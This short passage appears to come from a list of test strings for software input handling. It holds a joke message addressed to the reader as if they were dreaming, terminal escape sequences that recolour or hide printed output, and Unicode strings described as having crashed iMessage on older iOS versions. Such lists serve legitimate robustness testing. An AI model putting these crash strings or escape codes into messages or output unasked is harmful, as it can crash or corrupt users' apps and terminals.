If you're reading this, you've been in a coma for almost 20 years now. We're trying a new technique. We don't know where this message will end up in your dream, but we hope it works. Please wake up, we miss you. | |
# Terminal escape codes | |
# | |
# Strings which punish the fools who use cat/type on this file | |
Roses are �[0;31mred�[0m, violets are �[0;34mblue. Hope you enjoy terminal hue | |
But now...�[20Cfor my greatest trick...�[8m | |
The quic������k brown fo�����������x... [Beeeep] | |
# iOS Vulnerabilities | |
# | |
# Strings which crashed iMessage in various versions of iOS | |
Powerلُلُصّبُلُلصّبُررً ॣ ॣh ॣ ॣ冗 | |
🏳0🌈️ |